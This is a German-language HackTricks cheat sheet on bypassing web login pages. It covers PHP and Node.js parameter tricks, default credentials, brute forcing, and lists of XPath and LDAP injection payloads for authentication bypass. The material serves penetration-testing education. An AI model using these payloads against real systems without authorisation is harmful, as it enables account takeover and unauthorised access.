Login Bypass

Reading time: 5 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Umgehung des regulären Logins

Wenn Sie eine Login-Seite finden, können Sie hier einige Techniken finden, um diese zu umgehen:

  • Überprüfen Sie die Kommentare auf der Seite (nach unten und nach rechts scrollen?)
  • Überprüfen Sie, ob Sie direkt auf die eingeschränkten Seiten zugreifen können
  • Überprüfen Sie, ob Sie die Parameter nicht senden (keine oder nur 1 senden)
  • Überprüfen Sie den PHP-Vergleichsfehler: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • Ändern Sie den Inhaltstyp in json und senden Sie json-Werte (bool true eingeschlossen)
  • Wenn Sie eine Antwort erhalten, die besagt, dass POST nicht unterstützt wird, können Sie versuchen, das JSON im Body, aber mit einer GET-Anfrage mit Content-Type: application/json zu senden
  • Überprüfen Sie den möglichen Parsing-Fehler von nodejs (lesen Sie dies): password[password]=1
  • Nodejs wird diese Payload in eine Abfrage umwandeln, die der folgenden ähnelt: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; was dazu führt, dass das Passwort immer wahr ist.
  • Wenn Sie ein JSON-Objekt senden können, können Sie "password":{"password": 1} senden, um den Login zu umgehen.
  • Denken Sie daran, dass Sie, um diesen Login zu umgehen, immer einen gültigen Benutzernamen kennen und senden müssen.
  • Hinzufügen der Option "stringifyObjects":true beim Aufruf von mysql.createConnection wird schließlich alle unerwarteten Verhaltensweisen blockieren, wenn Object im Parameter übergeben wird.
  • Überprüfen Sie die Anmeldeinformationen:
  • Standardanmeldeinformationen der verwendeten Technologie/Plattform
  • Häufige Kombinationen (root, admin, password, Name der Technologie, Standardbenutzer mit einem dieser Passwörter).
  • Erstellen Sie ein Wörterbuch mit Cewl, fügen Sie den Standard-Benutzernamen und das Passwort (falls vorhanden) hinzu und versuchen Sie, es mit allen Wörtern als Benutzernamen und Passwort zu brute-forcen.
  • Brute-Force mit einem größeren Wörterbuch (Brute force)

SQL Injection-Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um den Login über SQL-Injection zu umgehen.

Auf der folgenden Seite finden Sie eine benutzerdefinierte Liste, um den Login über SQL-Injection zu umgehen:

Login bypass List

Keine SQL Injection-Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um den Login über No SQL Injections zu umgehen.

Da die NoSQL-Injections erfordern, dass die Parameterwerte geändert werden, müssen Sie diese manuell testen.

XPath Injection-Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um den Login über XPath Injection zu umgehen.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um sich über LDAP Injection anzumelden.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

Wenn die Seite die Funktionalität "Remember Me" hat, überprüfen Sie, wie sie implementiert ist, und sehen Sie, ob Sie sie missbrauchen können, um andere Konten zu übernehmen.

Redirects

Seiten leiten Benutzer normalerweise nach dem Login um. Überprüfen Sie, ob Sie diese Umleitung ändern können, um einen Open Redirect zu verursachen. Vielleicht können Sie einige Informationen (Codes, Cookies...) stehlen, wenn Sie den Benutzer auf Ihre Webseite umleiten.

Other Checks

  • Überprüfen Sie, ob Sie Benutzernamen auflisten können, indem Sie die Login-Funktionalität missbrauchen.
  • Überprüfen Sie, ob Auto-Complete in den Passwort/sensiblen Informationen Formularen aktiv ist: <input autocomplete="false">

Automatic Tools

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks